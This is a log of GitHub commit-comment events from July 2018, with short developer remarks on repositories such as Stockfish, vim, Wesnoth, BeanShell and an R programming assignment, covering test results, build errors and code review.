{"id":"7998539893","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29788467,"position":null,"line":null,"path":null,"commit_id":"613dbbafa1481b6409b46ffd1f3a1ef0ea286f11","created_at":"2018-07-21T12:30:47Z","updated_at":"2018-07-21T12:30:47Z","author_association":"NONE","body":"See the result ?\r\nELO: -3.13 +-10.0 (95%)\r\n\r\nWith 95% confidence, you got an elo measure in the interval  [-13, 7] \r\nNot useful at all !\r\n\r\n@Stefano80 I'm surprised  that you approved this test."}},"created_at":"2018-07-21T12:30:47Z"}
{"id":"7998539955","type":"CommitCommentEvent","actor":{"login":"kkapsner"},"repo":{"name":"kkapsner/CanvasBlocker"},"payload":{"comment":{"id":29788468,"position":null,"line":null,"path":null,"commit_id":"9ba9c4842298a26b5b842394501619491f382092","created_at":"2018-07-21T12:30:49Z","updated_at":"2018-07-21T12:30:49Z","author_association":"OWNER","body":"Danke - war gestern etwas spät..."}},"created_at":"2018-07-21T12:30:49Z"}
{"id":"7998541812","type":"CommitCommentEvent","actor":{"login":"vladthelittleone"},"repo":{"name":"mrmourax/vectree1"},"payload":{"comment":{"id":29788473,"position":84,"line":84,"path":"css/default.css","commit_id":"3a0fad347d0a6d7e565a2a5e7b5c3c1247ee029c","created_at":"2018-07-21T12:32:17Z","updated_at":"2018-07-21T12:32:17Z","author_association":"NONE","body":"CTRL + ALT + R"}},"created_at":"2018-07-21T12:32:17Z"}
{"id":"7998543573","type":"CommitCommentEvent","actor":{"login":"MikeUnwalla"},"repo":{"name":"languagetool-org/languagetool"},"payload":{"comment":{"id":29788476,"position":null,"line":null,"path":null,"commit_id":"27fa0ac209e3dda6be48169694e2e9c3cad9fa78","created_at":"2018-07-21T12:33:45Z","updated_at":"2018-07-21T12:33:45Z","author_association":"CONTRIBUTOR","body":"@FredKruse , thank you for adding the new 'tab' attribute. Visually, it works fine. \r\n\r\nTestrules gives an error message that tells me that \"cvc-complex-type.3.2.2: Attribute 'tab' is not allowed to appear in element 'category'.\" I have only very basic coding skills, and I did not find how to let testrules accept the new attribute. Could you change testrules such that it does not give a warning? Many thanks."}},"created_at":"2018-07-21T12:33:45Z"}
{"id":"7998545174","type":"CommitCommentEvent","actor":{"login":"streamich"},"repo":{"name":"streamich/nano-css"},"payload":{"comment":{"id":29788479,"position":null,"line":null,"path":null,"commit_id":"44aa82b283140a21f2521fc754443b549b96d6a1","created_at":"2018-07-21T12:35:04Z","updated_at":"2018-07-21T12:35:04Z","author_association":"OWNER","body":"Build version: __`3.0.1-feat-typescript.75`__ :crossed_fingers: [`feat-typescript`](https://github.com/streamich/nano-css/tree/feat-typescript) on [*CircleCI*](https://circleci.com/gh/streamich/nano-css/75) :tada:"}},"created_at":"2018-07-21T12:35:04Z"}
{"id":"7998546360","type":"CommitCommentEvent","actor":{"login":"duraiMuruganTY"},"repo":{"name":"Ryan970910/ProgrammingAssignment2"},"payload":{"comment":{"id":29788481,"position":13,"line":13,"path":"cachematrix.R","commit_id":"70a3467f4ac1afb03ab1fb121a5a0188cac0d25d","created_at":"2018-07-21T12:36:00Z","updated_at":"2018-07-21T12:36:00Z","author_association":"NONE","body":"function is incomplete"}},"created_at":"2018-07-21T12:36:00Z"}
{"id":"7998547704","type":"CommitCommentEvent","actor":{"login":"xKid0"},"repo":{"name":"xKid0/FreeCodeCamp-Projects"},"payload":{"comment":{"id":29788487,"position":null,"line":null,"path":null,"commit_id":"0952d5032a1d807951fa024c103a861f97e5e29b","created_at":"2018-07-21T12:37:09Z","updated_at":"2018-07-21T12:37:09Z","author_association":"OWNER","body":"Objective: Build a CodePen.io app that is functionally similar to this: https://codepen.io/freeCodeCamp/full/zNqgVx.\r\nFulfill the below user stories and get all of the tests to pass. Give it your own personal style.\r\nYou can use HTML, JavaScript, and CSS to complete this project. Plain CSS is recommended because that is what the lessons have covered so far and you should get some practice with plain CSS. You can use Bootstrap or SASS if you choose. Additional technologies (just for example jQuery, React, Angular, or Vue) are not recommended for this project, and using them is at your own risk. Other projects will give you a chance to work with different technology stacks like React. We will accept and try to fix all issue reports that use the suggested technology stack for this project. Happy coding!\r\nUser Story #1: My tribute page should have an element with a corresponding id=\"main\", which contains all other elements.\r\nUser Story #2: I should see an element with a corresponding id=\"title\", which contains a string (i.e. text) that describes the subject of the tribute page (e.g. \"Dr. Norman Borlaug\").\r\nUser Story #3: I should see a div element with a corresponding id=\"img-div\".\r\nUser Story #4: Within the img-div element, I should see an img element with a corresponding id=\"image\".\r\nUser Story #5: Within the img-div element, I should see an element with a corresponding id=\"img-caption\" that contains textual content describing the image shown in img-div.\r\nUser Story #6: I should see an element with a corresponding id=\"tribute-info\", which contains textual content describing the subject of the tribute page.\r\nUser Story #7: I should see an a element with a corresponding id=\"tribute-link\", which links to an outside site that contains additional information about the subject of the tribute page. HINT: You must give your element an attribute of target and set it to _blank in order for your link to open in a new tab (i.e. target=\"_blank\").\r\nUser Story #8: The img element should responsively resize, relative to the width of its parent element, without exceeding its original size.\r\nYou can build your project by forking this CodePen pen. Or you can use this CDN link to run the tests in any environment you like: https://gitcdn.link/repo/freeCodeCamp/testable-projects-fcc/master/build/bundle.js.\r\nOnce you're done, submit the URL to your working project with all its tests passing.\r\nRemember to use the Read-Search-Ask method if you get stuck."}},"created_at":"2018-07-21T12:37:09Z"}
{"id":"7998548761","type":"CommitCommentEvent","actor":{"login":"duraiMuruganTY"},"repo":{"name":"Ryan970910/ProgrammingAssignment2"},"payload":{"comment":{"id":29788489,"position":15,"line":14,"path":"cachematrix.R","commit_id":"70a3467f4ac1afb03ab1fb121a5a0188cac0d25d","created_at":"2018-07-21T12:38:08Z","updated_at":"2018-07-21T12:38:08Z","author_association":"NONE","body":"curly braces of a function will be  mandatory if the body of the function goes to next line"}},"created_at":"2018-07-21T12:38:08Z"}
{"id":"7998550387","type":"CommitCommentEvent","actor":{"login":"Robinlovelace"},"repo":{"name":"Robinlovelace/geocompr"},"payload":{"comment":{"id":29788494,"position":null,"line":null,"path":null,"commit_id":"168320d97a0674cc22c04ce036b314d3cbaea2f9","created_at":"2018-07-21T12:39:28Z","updated_at":"2018-07-21T12:39:28Z","author_association":"OWNER","body":"Job done :+1: "}},"created_at":"2018-07-21T12:39:28Z"}
{"id":"7998550470","type":"CommitCommentEvent","actor":{"login":"duraiMuruganTY"},"repo":{"name":"Ryan970910/ProgrammingAssignment2"},"payload":{"comment":{"id":29788495,"position":13,"line":13,"path":"cachematrix.R","commit_id":"70a3467f4ac1afb03ab1fb121a5a0188cac0d25d","created_at":"2018-07-21T12:39:32Z","updated_at":"2018-07-21T12:39:32Z","author_association":"NONE","body":"its MatrixGetting <- function() x\r\n"}},"created_at":"2018-07-21T12:39:32Z"}
{"id":"7998552249","type":"CommitCommentEvent","actor":{"login":"regetyu"},"repo":{"name":"wingle18/Student-Grade-Management-System"},"payload":{"comment":{"id":29788499,"position":null,"line":null,"path":null,"commit_id":"091e386aa03eed63c4dc81dc29d8b92a55356c9c","created_at":"2018-07-21T12:41:01Z","updated_at":"2018-07-21T12:41:01Z","author_association":"NONE","body":"good"}},"created_at":"2018-07-21T12:41:01Z"}
{"id":"7998552724","type":"CommitCommentEvent","actor":{"login":"chrisbra"},"repo":{"name":"vim/vim"},"payload":{"comment":{"id":29788501,"position":10,"line":64,"path":"runtime/mswin.vim","commit_id":"a9604e61451707b38fdcb088fbfaeea2b922fef6","created_at":"2018-07-21T12:41:24Z","updated_at":"2018-07-21T12:41:24Z","author_association":"MEMBER","body":"> +inoremap <C-S>\t\t<Esc>:update<CR>gi\r\n\r\nDoesn't that break in easy Vim?"}},"created_at":"2018-07-21T12:41:24Z"}
{"id":"7998557213","type":"CommitCommentEvent","actor":{"login":"doofus-01"},"repo":{"name":"wesnoth/wesnoth"},"payload":{"comment":{"id":29788511,"position":null,"line":null,"path":null,"commit_id":"3290961db2eb00221c94f88f02f77ab640f497a4","created_at":"2018-07-21T12:45:11Z","updated_at":"2018-07-21T12:45:11Z","author_association":"MEMBER","body":"The error I get is \r\n`g++: error: unrecognized command line option ‘-fstack-protector-strong’ `\r\n \r\nI've got the equals in `'Checking whether C++ compiler works (g++ version >= 4.8 required)... yes'`\r\nI assumed it would work if I had a higher version.\r\n\r\n-------------------------\r\nBTW is there a way to suppress the translations `/usr/bin/msgfmt --check-domain --statistics -o` messages?"}},"created_at":"2018-07-21T12:45:11Z"}
{"id":"7998560205","type":"CommitCommentEvent","actor":{"login":"AmardeepGO"},"repo":{"name":"AmardeepGO/mywebsite"},"payload":{"comment":{"id":29788522,"position":null,"line":null,"path":null,"commit_id":"472240e681f53dc43a3c21049e1356cacf5b8b25","created_at":"2018-07-21T12:47:44Z","updated_at":"2018-07-21T12:47:44Z","author_association":"OWNER","body":"atul.ml"}},"created_at":"2018-07-21T12:47:44Z"}
{"id":"7998560715","type":"CommitCommentEvent","actor":{"login":"mariejoyacajes"},"repo":{"name":"snipe/snipe-it"},"payload":{"comment":{"id":29788523,"position":null,"line":null,"path":null,"commit_id":"0438d55284816594d70247c95bebd69270cc18ab","created_at":"2018-07-21T12:48:09Z","updated_at":"2018-07-21T12:48:09Z","author_association":"NONE","body":"Thank you\n\nOn Wed, Jul 18, 2018 at 10:40 PM snipe <notifications@github.com> wrote:\n\n> Add @mariejoyacajes as a contributor\n>\n> --\n> You are receiving this because you were mentioned.\n> Reply to this email directly or view it on GitHub:\n>\n> https://github.com/snipe/snipe-it/commit/0438d55284816594d70247c95bebd69270cc18ab\n>\n"}},"created_at":"2018-07-21T12:48:09Z"}
{"id":"7998563826","type":"CommitCommentEvent","actor":{"login":"tkachik"},"repo":{"name":"tkachik/inlaender-1"},"payload":{"comment":{"id":29788538,"position":41,"line":null,"path":"programm/update Programm.md","commit_id":"529c875d165661b468034bd80684dd3c932c237d","created_at":"2018-07-21T12:50:47Z","updated_at":"2018-07-21T12:50:47Z","author_association":"OWNER","body":"In den Wohnviertel Geschwindigkeitskontrollen in den 30ger Zonen. Die Einnahmen gehen auf die Finanzierung von liegenden Polizisten in diesen Straßen."}},"created_at":"2018-07-21T12:50:47Z"}
{"id":"7998564855","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"double-beep/Stockfish"},"payload":{"comment":{"id":29788539,"position":null,"line":null,"path":null,"commit_id":"613dbbafa1481b6409b46ffd1f3a1ef0ea286f11","created_at":"2018-07-21T12:51:40Z","updated_at":"2018-07-21T12:51:40Z","author_association":"NONE","body":"Hi Rocky, on the other side, no harm has been done.\r\n\r\nI wanted to give the same comment as you did, I just forgot.\r\n\r\nYou know, it could be that the he is experimenting with tuning or whatever.  "}},"created_at":"2018-07-21T12:51:40Z"}
{"id":"7998568928","type":"CommitCommentEvent","actor":{"login":"larsbrinkhoff"},"repo":{"name":"MikeyGBG/forth-words"},"payload":{"comment":{"id":29788544,"position":null,"line":null,"path":null,"commit_id":"3a275f7fb2f3e6783cbfd06d134a93cba88f2e79","created_at":"2018-07-21T12:55:00Z","updated_at":"2018-07-21T12:55:00Z","author_association":"NONE","body":"Hello,\r\n\r\nIf you name this `.fth`, GitHub will know it's Forth."}},"created_at":"2018-07-21T12:55:00Z"}
{"id":"7998570938","type":"CommitCommentEvent","actor":{"login":"tkachik"},"repo":{"name":"tkachik/inlaender-1"},"payload":{"comment":{"id":29788547,"position":11,"line":null,"path":"programm/update Programm.md","commit_id":"529c875d165661b468034bd80684dd3c932c237d","created_at":"2018-07-21T12:56:40Z","updated_at":"2018-07-21T12:56:40Z","author_association":"OWNER","body":"Gekaufte Medien oder bezahlten Abos sind Europaweit gültig und ohne Verhinderung abrufbar, keine Ländersperre."}},"created_at":"2018-07-21T12:56:40Z"}
{"id":"7998572207","type":"CommitCommentEvent","actor":{"login":"siggi2git"},"repo":{"name":"Leafpub/leafpub"},"payload":{"comment":{"id":29788550,"position":null,"line":null,"path":null,"commit_id":"04633cad2ed93da0965897d915dba59a5124a2bc","created_at":"2018-07-21T12:57:40Z","updated_at":"2018-07-21T12:57:40Z","author_association":"NONE","body":"Works :+1:  Hätt' ich auch selbst drauf kommen können :smile: "}},"created_at":"2018-07-21T12:57:40Z"}
{"id":"7998573711","type":"CommitCommentEvent","actor":{"login":"luongsangit58"},"repo":{"name":"PHP-Nhom02-NIIT/websitePHP"},"payload":{"comment":{"id":29788551,"position":null,"line":null,"path":null,"commit_id":"7ca30b82fc2ba80421755c70ba73e92589f65d4b","created_at":"2018-07-21T12:58:53Z","updated_at":"2018-07-21T12:58:53Z","author_association":"CONTRIBUTOR","body":"error"}},"created_at":"2018-07-21T12:58:53Z"}
{"id":"7998580583","type":"CommitCommentEvent","actor":{"login":"petrolifero"},"repo":{"name":"rain-1/racket-peg"},"payload":{"comment":{"id":29788568,"position":null,"line":null,"path":null,"commit_id":"f28625767718f3812337fd192b44548bf4f0bc9d","created_at":"2018-07-21T13:04:07Z","updated_at":"2018-07-21T13:04:07Z","author_association":"CONTRIBUTOR","body":"With the  chance in comment, we are not able to match comments in the end of file.\r\n\r\nLike \r\n\r\n\"\r\nA< 'a' ;\r\n//Thaís comment Will be wrong because there's no newline after\""}},"created_at":"2018-07-21T13:04:07Z"}
{"id":"7998584419","type":"CommitCommentEvent","actor":{"login":"richyumul"},"repo":{"name":"richyumul/toys-for-joy"},"payload":{"comment":{"id":29788574,"position":null,"line":null,"path":null,"commit_id":"b4564dcb914ebfe2ecbd588454ef0a2786c0feb5","created_at":"2018-07-21T13:07:03Z","updated_at":"2018-07-21T13:07:03Z","author_association":"OWNER","body":"Created multidev environment [toys-for-joy#ci-19](https://dashboard.pantheon.io/sites/255bbf5d-2830-4fba-8604-186a8110e36d#ci-19).\n\n[![Visit Site](https://raw.githubusercontent.com/pantheon-systems/ci-drops-8/0.1.0/data/img/visit-site-36.png)](https://ci-19-toys-for-joy.pantheonsite.io/)"}},"created_at":"2018-07-21T13:07:03Z"}
{"id":"7998586565","type":"CommitCommentEvent","actor":{"login":"BAZEELANAQEEB"},"repo":{"name":"GeorgeMcIntire/fake_real_news_dataset"},"payload":{"comment":{"id":29788582,"position":null,"line":null,"path":null,"commit_id":"e9610fd6f73479cc0a65a1e4f977674f41c8f592","created_at":"2018-07-21T13:08:43Z","updated_at":"2018-07-21T13:08:43Z","author_association":"NONE","body":"i broke your dataset into training and test dataset and trained using Naive Bayes classifier...but its showing an accuracy of 0.0???\r\nhow to deal wit it?"}},"created_at":"2018-07-21T13:08:43Z"}
{"id":"7998594990","type":"CommitCommentEvent","actor":{"login":"Urumasi"},"repo":{"name":"TES3MP/openmw-tes3mp"},"payload":{"comment":{"id":29788594,"position":null,"line":null,"path":null,"commit_id":"64b5638d40bd08bb1b84eeeea0d23d0e4c6d1414","created_at":"2018-07-21T13:15:06Z","updated_at":"2018-07-21T13:15:06Z","author_association":"NONE","body":"Absolutely disgusting"}},"created_at":"2018-07-21T13:15:06Z"}
{"id":"7998596768","type":"CommitCommentEvent","actor":{"login":"jrmarino"},"repo":{"name":"jrmarino/ravensource"},"payload":{"comment":{"id":29788600,"position":null,"line":null,"path":null,"commit_id":"5b884f9ee35fd37cae5fff952141f126e186d892","created_at":"2018-07-21T13:16:32Z","updated_at":"2018-07-21T13:16:32Z","author_association":"OWNER","body":"hmm, looking at this, why is this an overridden target?\r\ncouldn't you use WRKSRC_INSTALL (IIRC) and no target?\r\nor define WRKSRC_BUILD ?\r\n\r\n(I need to check if those are the correct variables, but just looking at this excerpt, it seems wrong to override this target, especially since you dropped all the environment setting that the framework does.  When you override the target, you generally copy all the framework logic to the target and this is bare."}},"created_at":"2018-07-21T13:16:32Z"}
{"id":"7998599210","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29788604,"position":5,"line":28,"path":"src/hdskins/java/com/voxelmodpack/hdskins/server/SkinServer.java","commit_id":"dfd3c6f2ea50039ee83042bdfd95d65d88e92f7a","created_at":"2018-07-21T13:18:34Z","updated_at":"2018-07-21T13:18:34Z","author_association":"MEMBER","body":"I always forget that interfaces imply the `public` part. Leaving it anyway, so it's clear that gson is intended to be public. (It previously wasn't)"}},"created_at":"2018-07-21T13:18:34Z"}
{"id":"7998600281","type":"CommitCommentEvent","actor":{"login":"33mhz"},"repo":{"name":"sunya9/beta"},"payload":{"comment":{"id":29788607,"position":null,"line":null,"path":null,"commit_id":"cce535097c8f522714625a2d0d97cfb04aeaa8c1","created_at":"2018-07-21T13:19:28Z","updated_at":"2018-07-21T13:19:28Z","author_association":"CONTRIBUTOR","body":"I cannot see the difference between the beta.svg.zip file and [the existing file](https://github.com/sunya9/beta/blob/master/static/img/beta.png) except that the zipped version is 10x as big a file. I vote to close #109."}},"created_at":"2018-07-21T13:19:28Z"}
{"id":"7998601533","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788608,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T13:20:27Z","updated_at":"2018-07-21T13:20:27Z","author_association":"OWNER","body":"test"}},"created_at":"2018-07-21T13:20:27Z"}
{"id":"7998602266","type":"CommitCommentEvent","actor":{"login":"Sollace"},"repo":{"name":"MineLittlePony/MineLittlePony"},"payload":{"comment":{"id":29788610,"position":14,"line":14,"path":"src/hdskins/java/com/voxelmodpack/hdskins/util/Optionals.java","commit_id":"dfd3c6f2ea50039ee83042bdfd95d65d88e92f7a","created_at":"2018-07-21T13:21:02Z","updated_at":"2018-07-21T13:21:02Z","author_association":"MEMBER","body":"I was _looking_ for something like that. The name doesn't exactly imply it's usage. I thought they were mostly things that took callbacks/actions of some kind like `ifPresent`."}},"created_at":"2018-07-21T13:21:02Z"}
{"id":"7998612556","type":"CommitCommentEvent","actor":{"login":"aleos89"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":29788632,"position":28,"line":36,"path":"db/skill_damage_db.txt","commit_id":"a942853d55dd0e96ff98e6c352e2c2a9e000ea86","created_at":"2018-07-21T13:29:18Z","updated_at":"2018-07-21T13:29:18Z","author_association":"CONTRIBUTOR","body":"The `BL_` is for caster type. There was no separation between normal monster and boss monsters. The damage to them though is separated but that structure is still the same if you read the format on the top of the document."}},"created_at":"2018-07-21T13:29:18Z"}
{"id":"7998614961","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788636,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T13:31:05Z","updated_at":"2018-07-21T13:31:05Z","author_association":"OWNER","body":"newwwwwwwww"}},"created_at":"2018-07-21T13:31:05Z"}
{"id":"7998615337","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29788638,"position":null,"line":null,"path":null,"commit_id":"8e8d7093377d2648556237cad7dadf26b140d44e","created_at":"2018-07-21T13:31:21Z","updated_at":"2018-07-21T13:31:21Z","author_association":"NONE","body":"Don't you want to test as a simplification?"}},"created_at":"2018-07-21T13:31:21Z"}
{"id":"7998616012","type":"CommitCommentEvent","actor":{"login":"MrHinsh"},"repo":{"name":"nkdAgility/vsts-sync-migration"},"payload":{"comment":{"id":29788639,"position":null,"line":null,"path":null,"commit_id":"0d96c31ca42ff28442d2f472831704867204ee98","created_at":"2018-07-21T13:31:56Z","updated_at":"2018-07-21T13:31:56Z","author_association":"MEMBER","body":"Should be linked to #149 "}},"created_at":"2018-07-21T13:31:56Z"}
{"id":"7998616468","type":"CommitCommentEvent","actor":{"login":"ystoneman"},"repo":{"name":"ystoneman/ystoneman.github.io"},"payload":{"comment":{"id":29788640,"position":null,"line":null,"path":null,"commit_id":"c8d61562cb7aaaf34d37b5a60b325c708f82fc5f","created_at":"2018-07-21T13:32:18Z","updated_at":"2018-07-21T13:32:18Z","author_association":"OWNER","body":"Because I read that durations are better represented in scaleLinear rather than scaleTime. My goal is to make the y-axis ticks show \"round\" seconds like :00 and :15. Apparently, you can't add a tick array with scaleLinear."}},"created_at":"2018-07-21T13:32:18Z"}
{"id":"7998618125","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788642,"position":1,"line":1,"path":"jitpack.yml","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T13:33:34Z","updated_at":"2018-07-21T13:33:34Z","author_association":"NONE","body":"Done, removed"}},"created_at":"2018-07-21T13:33:34Z"}
{"id":"7998618506","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788643,"position":1,"line":1,"path":"license.txt","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T13:33:52Z","updated_at":"2018-07-21T13:33:52Z","author_association":"NONE","body":"<3"}},"created_at":"2018-07-21T13:33:52Z"}
{"id":"7998618523","type":"CommitCommentEvent","actor":{"login":"tophf"},"repo":{"name":"openstyles/stylus"},"payload":{"comment":{"id":29788644,"position":3,"line":10,"path":"tools/zip.js","commit_id":"e855ac2c0b906ecc176c970b932cfdb47d9c85bb","created_at":"2018-07-21T13:33:53Z","updated_at":"2018-07-21T13:33:53Z","author_association":"MEMBER","body":"'.editorconfig' is also matched by `.*`"}},"created_at":"2018-07-21T13:33:53Z"}
{"id":"7998618841","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788645,"position":431,"line":null,"path":"detekt-rules.yml","commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T13:34:09Z","updated_at":"2018-07-21T13:34:09Z","author_association":"OWNER","body":"Great stuff"}},"created_at":"2018-07-21T13:34:09Z"}
{"id":"7998620000","type":"CommitCommentEvent","actor":{"login":"nickl-"},"repo":{"name":"beanshell/beanshell"},"payload":{"comment":{"id":29788647,"position":137,"line":295,"path":"src/main/java/bsh/Interpreter.java","commit_id":"9b4d2d746f0653be93dcbb1dbc8c4a53ba3c9430","created_at":"2018-07-21T13:35:08Z","updated_at":"2018-07-21T13:35:08Z","author_association":"MEMBER","body":"> I guess what I am trying to say is that Out/Err will set the stream of a Console object instead of the ones of the ConsoleInterface object I am passing in... [snip]  ...since I am providing the streams I would expect that I would be able to intercept setOut/Err, thing that is not supported by the current interface. \r\n\r\nI believe the functionality is now what you are expecting.\r\n\r\n> Another option: do you really need to keep compatibility given that you are releasing a major update to the old beanshell?\r\n\r\nWe can also argue that the previous releases were still in beta so breaking aught to be expected. I am sure there are already many breaks, even just methods relocating will cause compatibility faults. It's not perfect but something we should always strive for and is much appreciated when upgrading existing integrations. Consider carefully your public APIs... \r\n\r\n> Another use case is as follows (for example for bshconsole): You subclass bsh.Interpreter in bsh\r\n\r\nThe package is our namespace.. disclaimer reads: Here be dragons, use at own risk. We are not responsible to maintain compatibility.\r\n\r\n> You now have access to console field (it should actually be private, but for now it is not)\r\n> Then:\r\n\r\nPackage private is a compromise, the best of both worlds. It is not visible by normal conventions which clearly specifies scope and intent... yet can still be accessed if the needs be.\r\n\r\n```java\r\n  bsh.MyInterpreter i = new bsh.MyInterpreter(new MyConsole());\r\n  ...\r\n  MyConsole c = (MyConsole)i.console; // java.lang.ClassCastException !!!\r\n```\r\n\r\nI have a feeling this is something the developer should address, not sure we can do much to assist."}},"created_at":"2018-07-21T13:35:08Z"}
{"id":"7998621114","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788648,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T13:36:05Z","updated_at":"2018-07-21T13:36:05Z","author_association":"OWNER","body":"Great stuff Man"}},"created_at":"2018-07-21T13:36:05Z"}
{"id":"7998621729","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788649,"position":52,"line":52,"path":"pom.xml","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T13:36:33Z","updated_at":"2018-07-21T13:36:33Z","author_association":"NONE","body":"Done"}},"created_at":"2018-07-21T13:36:33Z"}
{"id":"7998621957","type":"CommitCommentEvent","actor":{"login":"Cranite"},"repo":{"name":"Maxopoly/MoreEnchantables"},"payload":{"comment":{"id":29788650,"position":72,"line":72,"path":"pom.xml","commit_id":"93cf861458bf8500f03ac6658d0a53a82e378b8f","created_at":"2018-07-21T13:36:43Z","updated_at":"2018-07-21T13:36:43Z","author_association":"NONE","body":"<3"}},"created_at":"2018-07-21T13:36:43Z"}
{"id":"7998622429","type":"CommitCommentEvent","actor":{"login":"tarek360"},"repo":{"name":"tarek360/emptyapp"},"payload":{"comment":{"id":29788651,"position":null,"line":null,"path":null,"commit_id":"8cfd8ed0c49e4b8c07c6a8d670f6b22443b21c7e","created_at":"2018-07-21T13:37:06Z","updated_at":"2018-07-21T13:37:06Z","author_association":"OWNER","body":"Great stuff Guys"}},"created_at":"2018-07-21T13:37:06Z"}
{"id":"7998624135","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29788653,"position":null,"line":null,"path":null,"commit_id":"8e8d7093377d2648556237cad7dadf26b140d44e","created_at":"2018-07-21T13:38:24Z","updated_at":"2018-07-21T13:38:24Z","author_association":"OWNER","body":"Are we looking at the same code ?\r\n\r\nThis test is same as master plus 2 lines:\r\n```\r\nb = weak & ~nonPawnEnemies & shift<Down>(pos.pieces()) & attackedBy[Them][ALL_PIECES];  \r\nscore += OverloadBlocked * popcount(b); \r\n```\r\n"}},"created_at":"2018-07-21T13:38:24Z"}
{"id":"7998624182","type":"CommitCommentEvent","actor":{"login":"TXLuong"},"repo":{"name":"TXLuong/Test"},"payload":{"comment":{"id":29788654,"position":null,"line":null,"path":null,"commit_id":"1444644e367add7178817e6b04c99cf0a67cb7bb","created_at":"2018-07-21T13:38:27Z","updated_at":"2018-07-21T13:38:27Z","author_association":"OWNER","body":"sdasa"}},"created_at":"2018-07-21T13:38:27Z"}
{"id":"7998625705","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29788656,"position":63,"line":63,"path":"RockPaperScissors.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-21T13:39:41Z","updated_at":"2018-07-21T13:39:41Z","author_association":"OWNER","body":"anti is misspelled, should be ante and works as the names describes.  its the amount of token the user is transferring from there token account.  this method cant, or at least wasn't intended to be payable because transferring fund into (payable) and our of your tokens account is handled by the super class - see GameTokens.\r\n(i was thinking of tokens, like chips at a casino, u gotta trade cash/ethier for tokens if you want to play any games...)"}},"created_at":"2018-07-21T13:39:41Z"}
{"id":"7998626536","type":"CommitCommentEvent","actor":{"login":"Stefano80"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29788657,"position":null,"line":null,"path":null,"commit_id":"8e8d7093377d2648556237cad7dadf26b140d44e","created_at":"2018-07-21T13:40:21Z","updated_at":"2018-07-21T13:40:21Z","author_association":"NONE","body":"I am talking about http://tests.stockfishchess.org/tests/view/5b5335270ebc5902bdb80e47 "}},"created_at":"2018-07-21T13:40:21Z"}
{"id":"7998626588","type":"CommitCommentEvent","actor":{"login":"NateWickstrom"},"repo":{"name":"NateWickstrom/rock-paper-scissors-solidity"},"payload":{"comment":{"id":29788658,"position":71,"line":71,"path":"RockPaperScissors.sol","commit_id":"609eab8bdcc2a0a64efab4675413ae9198e246eb","created_at":"2018-07-21T13:40:23Z","updated_at":"2018-07-21T13:40:23Z","author_association":"OWNER","body":"good idea!"}},"created_at":"2018-07-21T13:40:23Z"}
{"id":"7998626809","type":"CommitCommentEvent","actor":{"login":"NicolasDorier"},"repo":{"name":"MetacoSA/NBitcoin"},"payload":{"comment":{"id":29788659,"position":5,"line":1156,"path":"NBitcoin/Transaction.cs","commit_id":"6789b7e930e3a66bc1da602c9792b15aff46de8b","created_at":"2018-07-21T13:40:36Z","updated_at":"2018-07-21T13:40:36Z","author_association":"MEMBER","body":"Because the instance might be a class derived from Network (For example GroestlcoinTransaction or ForkIdTransaction for BGold and BCash)"}},"created_at":"2018-07-21T13:40:36Z"}
{"id":"7998627652","type":"CommitCommentEvent","actor":{"login":"shingoushori"},"repo":{"name":"shingoushori/simutrans"},"payload":{"comment":{"id":29788664,"position":null,"line":null,"path":null,"commit_id":"54bfdc6f5df42acf98c14c0301f9daf4f65494f0","created_at":"2018-07-21T13:41:17Z","updated_at":"2018-07-21T13:41:17Z","author_association":"OWNER","body":"↓here is the miserable bug fix ...\r\nhttps://github.com/shingoushori/simutrans/commit/f454036d6a47f892a3a4c8191f4e990171590905"}},"created_at":"2018-07-21T13:41:17Z"}
{"id":"7998628545","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"Rocky640/Stockfish"},"payload":{"comment":{"id":29788665,"position":null,"line":null,"path":null,"commit_id":"8e8d7093377d2648556237cad7dadf26b140d44e","created_at":"2018-07-21T13:41:59Z","updated_at":"2018-07-21T13:41:59Z","author_association":"OWNER","body":"Me too :)\r\n\r\n"}},"created_at":"2018-07-21T13:41:59Z"}
